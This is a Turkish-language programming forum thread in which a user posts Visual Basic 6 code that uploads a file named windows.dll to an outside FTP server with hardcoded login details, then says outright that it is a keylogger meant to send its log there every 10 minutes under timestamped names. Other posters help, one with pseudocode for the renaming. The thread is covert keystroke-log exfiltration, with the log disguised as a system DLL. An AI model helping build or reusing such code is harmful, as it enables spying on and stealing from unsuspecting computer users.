Vb6,0 Ftp Dosya Upload Sorunu

1. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gowand
    gowand's avatar
    Erkek

Private Sub Command1_Click()

Form1.Inet1.Execute , "put e:\windows.dll windows.dll"

End Sub

Private Sub Form_Load()

Inet1.AccessType = icUseDefault

Inet1.Protocol = icFTP

Inet1.RemoteHost = "ftp.cwahi.net"

Inet1.RemotePort = "21"

Inet1.Password = "şifreşifre"

Inet1.UserName = "gowand101"

Inet1.RequestTimeout = "60"

End Sub

--------------------------------------------------------------------------------------------------------------------------------------------------------------------

Buraya Kadar Bir Sorun Yok Fakat Bunu Timerla Saatte 1 yapmak istiyorum heralde Label e saydırmam gerekecek ama her upload ettiğinde windows.dll diye kaydedio ve bu yuzden eski kaydın üstüne yazıyor bunun yerine her upload ettiğinde saat tarih windows.dll nin yerinde olsa süper olur...

with great power comes great irresponsibility ‪#‎deadpool‬
  2. KısayolKısayol reportŞikayet pmÖzel Mesaj
    ustura
    ustura's avatar
    Banlanmış Üye
    Erkek

keylogger tarzı birsey yazıyorsun sanırım hazır class lar var onlari kullan clsFTP , SocketMAster gibi OCX gerektirmez

itsin oglum sen adam degilsin
  3. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gowand
    gowand's avatar
    Erkek
    ustura bunu yazdı

keylogger tarzı birsey yazıyorsun sanırım hazır class lar var onlari kullan clsFTP , SocketMAster gibi OCX gerektirmez

evet ama bu dediklerinizi bilmiorm yardım edebilirmsnzzz

4. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gowand
    gowand's avatar
    Erkek

konu güncel ftp ye farklı isimle yada her 10dakikada bir o dakikanın adıyla nasıl upload edebilrim örnek

label1.caption= 3
    Form1.Inet1.Execute , "put e:\windows.dll windows.dll"
     bunu windows.dll yerine 23/08/2014windows.dll gibi kay detsin mesela birde label caption olayını nasıl tekraralatabiliriz....

5. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sharp
    Sharp's avatar
    Erkek

hocam senin sorunun visual basic ile falan alakali degil. 

en temel duzeyde bakildiginda, asil sorunun, okumadan yazmaya gecmis olusun!

neyse,

http://technet.microsoft.com/en-us/library/bb490671.aspx

put <localfile> [remotefile]

yani sair burda diyor ki, put yazdiktan sonra localfile vermek zorundasin, ancak remote file vermesende olur ! he vermez isen, localfile olarak verdigin dosya adi ile yaratir remote'a kopyalanacak file'i,,,  he oldu ki bir cilginlik yaptin ve remotefile ismi verdin,, o da bu cilginligina ayni derecede cilginlikla karsilik vererek, dosyayi senin verdigin isimle yaratir.

put e:\local.txt 0102remote.txt

20 dk sonra

put e:\local.txt 0122remote.txt

gibi ;)

www.yesilgrow.com - Growshop
  6. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gowand
    gowand's avatar
    Erkek
    Sharp bunu yazdı

hocam senin sorunun visual basic ile falan alakali degil. 

en temel duzeyde bakildiginda, asil sorunun, okumadan yazmaya gecmis olusun!

neyse,

http://technet.microsoft.com/en-us/library/bb490671.aspx

put [remotefile]

yani sair burda diyor ki, put yazdiktan sonra localfile vermek zorundasin, ancak remote file vermesende olur ! he vermez isen, localfile olarak verdigin dosya adi ile yaratir remote'a kopyalanacak file'i,,,  he oldu ki bir cilginlik yaptin ve remotefile ismi verdin,, o da bu cilginligina ayni derecede cilginlikla karsilik vererek, dosyayi senin verdigin isimle yaratir.

put e:\local.txt 0102remote.txt

20 dk sonra

put e:\local.txt 0122remote.txt

gibi ;)

hocam ne içiyon banada ver yada bana yardım et yeter keylogger 10dk bir logu farklı isimle ftpye kaydetsin bu baska yok :D

7. KısayolKısayol reportŞikayet pmÖzel Mesaj
    Sharp
    Sharp's avatar
    Erkek

aslinda yardim ettim fakat anlam veremedin sanirim :D

simdi ben visual basic falan bilmem, o yuzden kod paylasamicam ama pseudocode haliyle algoritmayi yazicam.

bir string degiskenimiz olsun ve adi da FtpCommand olsun

soz gelimi sistem tarih-saatini alip bize string olarak donen bir fonksiyon olsun ve adi da GetSystemTime()  olsun

ve yine soz gelimi uzerinde calistigimiz dilin basit string operasyonlarini destekledigini varsayarak ( Visual Basic karsiliyodur heralde )

....

String FtpCommand   [ degisken tanimlama ]

FtpCommand = "put e:\bok.dll " + GetSystemTime() + "bok.dll"    [ deger atama ]

[ FtpCommand degiskeni su anda "put e:\bok.dll 01-01-1999-01-01-01bok.dll" degerini tasiyor ]

Form1.Inet1.Execute , FtpCommand     [ ilgili fonksiyonu cagirma ]

....

heralde anlamissindir.. eger hala anlamadiysan, bu sefer ben sana "ne iciyosan bana da gonder!" tabeliyle gelicem.. :)

www.yesilgrow.com - Growshop
  8. KısayolKısayol reportŞikayet pmÖzel Mesaj
    gowand
    gowand's avatar
    Erkek
    Sharp bunu yazdı

aslinda yardim ettim fakat anlam veremedin sanirim :D

simdi ben visual basic falan bilmem, o yuzden kod paylasamicam ama pseudocode haliyle algoritmayi yazicam.

bir string degiskenimiz olsun ve adi da FtpCommand olsun

soz gelimi sistem tarih-saatini alip bize string olarak donen bir fonksiyon olsun ve adi da GetSystemTime()  olsun

ve yine soz gelimi uzerinde calistigimiz dilin basit string operasyonlarini destekledigini varsayarak ( Visual Basic karsiliyodur heralde )

....

String FtpCommand   [ degisken tanimlama ]

FtpCommand = "put e:\bok.dll " + GetSystemTime() + "bok.dll"    [ deger atama ]

[ FtpCommand degiskeni su anda "put e:\bok.dll 01-01-1999-01-01-01bok.dll" degerini tasiyor ]

Form1.Inet1.Execute , FtpCommand     [ ilgili fonksiyonu cagirma ]

....

heralde anlamissindir.. eger hala anlamadiysan, bu sefer ben sana "ne iciyosan bana da gonder!" tabeliyle gelicem.. :)

hocam bende ankarada okuyorum gelince sizi bulcam :D mantıksal olarak anladım da kod lazım :D...

Toplam Hit: 1909 Toplam Mesaj: 8